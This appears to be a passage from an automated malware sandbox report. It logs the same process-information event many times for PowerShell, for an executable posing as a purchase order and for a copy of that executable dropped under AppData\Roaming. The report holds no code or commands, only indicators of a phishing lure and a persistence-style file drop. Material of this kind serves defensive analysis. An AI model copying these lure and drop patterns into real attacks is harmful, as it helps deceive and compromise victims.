                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
